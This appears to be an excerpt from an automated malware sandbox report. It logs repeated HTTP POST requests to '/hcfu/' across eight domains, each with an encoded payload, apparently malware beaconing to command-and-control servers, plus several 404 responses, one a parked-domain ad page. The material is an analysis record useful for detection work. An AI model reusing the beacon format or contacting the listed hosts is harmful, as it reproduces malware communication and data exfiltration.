Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.bandmarket.liveConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.bandmarket.liveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.bandmarket.live/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 5a 4e 74 54 4e 68 7e 38 5a 59 4f 69 4e 73 68 4e 58 57 47 75 69 4d 54 68 46 36 63 42 77 69 4b 5f 74 61 63 57 37 55 44 54 47 79 46 6b 79 32 42 72 61 41 28 6b 79 35 6f 70 4a 43 54 62 36 58 56 53 55 71 6f 32 74 72 74 32 6e 43 6a 4b 48 6c 54 72 75 35 32 41 44 74 31 4b 39 71 53 58 28 79 49 48 77 6b 4d 79 79 6e 35 5a 6a 59 49 30 53 45 47 4b 78 70 38 37 6c 49 45 70 47 58 77 70 33 66 6d 4d 6b 39 67 46 48 6d 55 39 51 78 32 63 68 41 47 72 54 67 49 56 6d 55 6b 45 4e 66 57 4f 37 65 32 65 4f 39 6b 6a 4f 56 43 49 7e 43 64 6b 33 39 4c 65 73 53 53 64 68 55 30 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=ZNtTNh~8ZYOiNshNXWGuiMThF6cBwiK_tacW7UDTGyFky2BraA(ky5opJCTb6XVSUqo2trt2nCjKHlTru52ADt1K9qSX(yIHwkMyyn5ZjYI0SEGKxp87lIEpGXwp3fmMk9gFHmU9Qx2chAGrTgIVmUkENfWO7e2eO9kjOVCI~Cdk39LesSSdhU0.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.aurakids.websiteConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.aurakids.websiteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.aurakids.website/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 41 37 34 49 64 4f 35 4e 55 4e 6b 77 48 30 42 66 34 62 4c 44 78 6f 7a 4a 65 51 4f 4f 4b 31 30 72 30 63 30 6e 56 6c 49 71 57 32 72 38 68 4d 74 73 78 4f 5a 2d 55 46 52 4a 39 4b 5a 61 6e 4a 39 5a 43 35 6b 45 58 6e 75 75 4e 4d 72 4b 4c 6c 37 48 66 49 76 68 70 32 4a 77 57 73 4e 36 53 77 35 74 6a 73 68 4e 58 51 68 49 63 39 57 43 57 72 4f 77 55 5f 76 64 38 5a 45 2d 62 47 4c 73 47 4e 37 39 57 50 63 4b 32 71 50 75 41 43 6b 39 43 48 65 77 57 43 4a 4d 72 56 62 41 48 39 67 34 7a 70 39 4a 7e 6f 51 69 6b 52 50 62 32 67 30 35 78 69 6b 65 4d 5a 6d 66 6d 6e 59 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=A74IdO5NUNkwH0Bf4bLDxozJeQOOK10r0c0nVlIqW2r8hMtsxOZ-UFRJ9KZanJ9ZC5kEXnuuNMrKLl7HfIvhp2JwWsN6Sw5tjshNXQhIc9WCWrOwU_vd8ZE-bGLsGN79WPcK2qPuACk9CHewWCJMrVbAH9g4zp9J~oQikRPb2g05xikeMZmfmnY.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.parkperge.comConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.parkperge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.parkperge.com/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 65 68 53 66 4e 6b 77 34 4c 34 68 6d 46 71 58 52 68 62 6c 56 44 6e 32 68 59 76 73 35 69 58 66 50 53 6a 43 78 73 78 72 71 4b 48 46 58 69 30 76 32 7e 48 66 6b 71 69 70 33 66 68 58 48 31 4c 62 74 41 6c 4e 46 75 50 78 48 71 78 77 58 47 57 41 45 65 52 33 67 72 6b 79 67 38 47 6b 66 71 56 58 38 49 2d 75 54 35 6f 6d 6e 72 31 6f 4a 4f 6f 49 4b 55 37 36 48 45 45 65 66 45 30 46 4f 6c 74 46 50 34 30 52 34 36 35 64 7a 6c 39 7a 73 30 53 48 35 31 51 73 5f 69 6e 50 74 78 75 6d 4a 39 39 6c 31 6d 55 50 34 42 4f 34 77 6b 79 63 52 63 4a 7e 69 78 4b 63 4f 28 64 73 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=ehSfNkw4L4hmFqXRhblVDn2hYvs5iXfPSjCxsxrqKHFXi0v2~Hfkqip3fhXH1LbtAlNFuPxHqxwXGWAEeR3grkyg8GkfqVX8I-uT5omnr1oJOoIKU76HEEefE0FOltFP40R465dzl9zs0SH51Qs_inPtxumJ99l1mUP4BO4wkycRcJ~ixKcO(ds.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.paulmontecalvo.comConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.paulmontecalvo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.paulmontecalvo.com/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 73 69 47 66 57 57 49 57 48 64 7e 6b 45 7a 61 4a 6c 47 4d 71 45 32 53 4e 66 7a 46 77 7a 76 6a 68 6b 57 6f 51 69 76 74 66 62 65 46 77 35 65 51 51 4b 43 59 54 36 78 51 6e 76 48 4a 48 77 5a 44 32 6d 4a 48 4b 46 6d 4c 38 37 73 71 46 39 78 36 39 34 67 28 64 37 36 42 6f 49 4c 79 31 34 4e 58 59 72 39 57 59 6c 30 59 5f 4b 38 71 54 49 73 5a 68 7e 35 4e 5a 44 41 43 6d 34 35 35 51 59 72 44 35 77 4b 66 51 61 6f 38 4e 7e 4e 4a 2d 32 66 52 63 59 76 6c 36 67 71 4f 34 77 4b 4c 73 4f 44 6a 68 54 44 52 4c 72 65 6c 69 76 37 70 4d 37 4d 63 42 35 41 4c 31 71 77 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=siGfWWIWHd~kEzaJlGMqE2SNfzFwzvjhkWoQivtfbeFw5eQQKCYT6xQnvHJHwZD2mJHKFmL87sqF9x694g(d76BoILy14NXYr9WYl0Y_K8qTIsZh~5NZDACm455QYrD5wKfQao8N~NJ-2fRcYvl6gqO4wKLsODjhTDRLreliv7pM7McB5AL1qwk.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.lilustrlousdates.comConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.lilustrlousdates.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.lilustrlousdates.com/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 31 42 7e 55 4c 46 48 68 4b 78 6a 34 28 68 73 74 74 36 6a 42 65 5a 5a 42 32 43 32 59 39 36 71 6d 61 37 6c 32 55 41 79 73 34 4a 6d 32 6b 65 6c 5a 68 73 28 57 33 47 35 6e 46 49 39 77 76 78 30 4b 4c 35 73 4e 62 54 30 51 51 31 45 45 79 2d 4a 4d 6c 6a 33 78 58 62 4d 74 39 41 35 44 45 5f 7e 72 55 39 42 46 54 72 68 73 67 39 6e 4a 68 6e 61 38 69 52 79 34 44 50 53 64 71 56 41 32 38 7a 37 62 75 79 49 79 69 33 6b 4c 45 73 72 38 6b 6f 56 68 6f 30 4d 67 41 62 79 6b 74 5f 55 67 5a 4b 44 4e 74 4d 56 7a 4a 32 45 76 48 4b 78 50 71 65 55 32 5a 44 32 59 46 32 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=1B~ULFHhKxj4(hstt6jBeZZB2C2Y96qma7l2UAys4Jm2kelZhs(W3G5nFI9wvx0KL5sNbT0QQ1EEy-JMlj3xXbMt9A5DE_~rU9BFTrhsg9nJhna8iRy4DPSdqVA28z7buyIyi3kLEsr8koVho0MgAbykt_UgZKDNtMVzJ2EvHKxPqeU2ZD2YF2M.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.montazeran.netConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.montazeran.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.montazeran.net/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 4a 43 75 6e 37 2d 38 46 6f 62 38 65 28 59 48 5f 70 73 78 42 50 79 4d 75 35 47 4f 33 46 6c 4b 42 45 6b 4c 74 4b 4b 30 73 7a 43 62 71 42 43 51 69 6e 41 38 2d 63 5f 63 74 52 76 59 6f 66 5a 28 37 65 78 34 6f 56 49 79 45 32 77 30 33 33 4b 70 4d 34 6d 50 51 30 66 74 47 42 44 32 52 4f 4a 6d 4f 51 6d 72 4e 66 6b 6e 37 32 34 56 61 65 6d 6d 5a 4f 55 49 77 66 6a 4f 53 44 68 64 6e 6e 58 75 52 4c 63 4d 71 72 55 78 7a 28 4a 4b 45 73 43 44 66 48 36 4b 32 31 78 54 47 45 42 6b 59 69 41 63 36 4f 6f 52 67 63 48 6d 4b 37 52 66 54 38 43 35 70 66 53 71 49 28 52 30 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=JCun7-8Fob8e(YH_psxBPyMu5GO3FlKBEkLtKK0szCbqBCQinA8-c_ctRvYofZ(7ex4oVIyE2w033KpM4mPQ0ftGBD2ROJmOQmrNfkn724VaemmZOUIwfjOSDhdnnXuRLcMqrUxz(JKEsCDfH6K21xTGEBkYiAc6OoRgcHmK7RfT8C5pfSqI(R0.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.khelojeetopro.comConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.khelojeetopro.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.khelojeetopro.com/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 42 50 42 49 6c 50 4b 33 67 64 28 44 63 63 5a 52 5a 39 51 78 67 42 45 76 30 68 57 76 70 72 68 74 7a 54 45 6b 6e 61 4f 58 75 2d 4c 50 71 50 6c 67 48 73 70 46 76 65 4b 62 33 75 72 4b 6f 37 6b 4d 6e 43 28 65 69 51 59 4f 79 73 45 66 63 41 71 36 39 6b 4e 33 4f 33 5a 6a 39 79 39 41 41 5f 74 73 43 53 6a 31 4c 62 31 62 48 4e 6f 5a 51 38 4f 6a 43 43 55 5f 6b 6d 30 61 34 4a 79 75 71 76 6d 77 64 53 71 6e 4b 6f 4d 42 43 74 5a 2d 4e 50 71 32 4c 70 77 70 54 56 36 64 47 69 54 35 78 68 4e 71 78 67 7e 64 42 65 62 6f 37 32 58 46 68 57 69 49 34 48 68 43 46 61 51 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=BPBIlPK3gd(DccZRZ9QxgBEv0hWvprhtzTEknaOXu-LPqPlgHspFveKb3urKo7kMnC(eiQYOysEfcAq69kN3O3Zj9y9AA_tsCSj1Lb1bHNoZQ8OjCCU_km0a4JyuqvmwdSqnKoMBCtZ-NPq2LpwpTV6dGiT5xhNqxg~dBebo72XFhWiI4HhCFaQ.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.biggaming.xyzConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.biggaming.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.biggaming.xyz/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 4f 65 35 56 6e 54 38 30 6a 4b 74 6a 51 63 4b 30 6f 58 50 67 56 59 35 48 72 36 74 44 53 41 53 46 6f 6e 7e 6f 4e 6c 68 62 79 62 70 75 44 5f 47 4e 59 44 61 7a 7a 66 41 6a 50 7a 28 33 64 51 5a 34 42 49 69 46 4b 48 4c 57 6e 47 54 67 45 6c 74 43 48 4a 53 43 77 5f 50 42 7a 33 48 32 55 79 78 50 6d 73 51 76 48 70 30 79 75 7a 6c 30 6f 5f 6a 57 6e 63 74 39 34 64 6b 43 69 42 64 42 68 41 62 36 54 4a 52 53 58 6f 44 48 56 61 37 51 77 50 7e 65 32 6f 37 36 59 59 7a 6a 35 66 49 62 4e 67 28 70 48 65 36 52 67 63 47 73 78 56 7a 59 4f 4d 6d 44 33 4a 32 59 67 4b 67 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=Oe5VnT80jKtjQcK0oXPgVY5Hr6tDSASFon~oNlhbybpuD_GNYDazzfAjPz(3dQZ4BIiFKHLWnGTgEltCHJSCw_PBz3H2UyxPmsQvHp0yuzl0o_jWnct94dkCiBdBhAb6TJRSXoDHVa7QwP~e2o76YYzj5fIbNg(pHe6RgcGsxVzYOMmD3J2YgKg.

Source: unknown

Network traffic detected: IP country count 10

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:06:41 GMTServer: ApacheContent-Length: 236Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:06:52 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:06:54 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 24 Oct 2022 09:06:59 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 24 Oct 2022 09:07:01 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 